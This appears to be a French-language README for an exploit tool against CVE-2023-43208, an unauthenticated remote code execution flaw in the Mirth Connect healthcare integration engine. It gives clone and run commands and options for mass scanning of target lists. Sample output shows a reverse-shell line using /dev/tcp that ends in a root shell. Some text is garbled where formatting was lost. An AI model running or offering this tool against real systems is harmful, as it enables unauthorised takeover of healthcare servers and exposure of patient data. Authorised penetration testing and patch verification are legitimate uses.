
Exploit RCE non authentifié pour CVE-2023-43208 dans Mirth Connect via une désérialisation XML, avec détection de version, analyse en masse et shell PTY interactif.
Exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance non authentifiée dans Mirth Connect versions antérieures à
4.4.1.
Mirth Connect est un moteur d'intégration de soins de santé open-source largement déployé. Cette vulnérabilité exploite une faille de désérialisation Java via le point de terminaison /api/users en utilisant une charge utile XML conçue pour chaîner des gadgets Apache Commons Collections afin d'obtenir une RCE non authentifiée. La version améliorée remplace l'écouteur pwncat original par un shell PTY interactif sans dépendance, utilisant uniquement les modules natifs de Python (socket, , , ). Le shell est automatiquement mis à niveau vers un PTY complet lors de la connexion.
selectttytermios| Logiciel | Versions vulnérables | Version corrigée |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script)stty rows/cols)pwncat — uniquement la bibliothèque standard pour l'écouteurgit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
| Option | Description |
|---|---|
-u, --url | URL cible |
-lh, --lhost | Votre IP d'écoute |
-lp, --lport | Votre port d'écoute |
-bp, --bindport | Remplacement du port de liaison (utile avec ngrok) |
-f, --file | Fichier contenant la liste des URL cibles |
-o, --output | Enregistrer les cibles vulnérables dans un fichier |
-t, --threads | Nombre de threads pour le scan (défaut : 50) |
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
Cet outil est destiné uniquement à des tests de pénétration autorisés et à des fins éducatives.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement la permission de tester est illégale.
Les auteurs ne sont pas responsables de toute mauvaise utilisation ou des dommages causés par cet outil.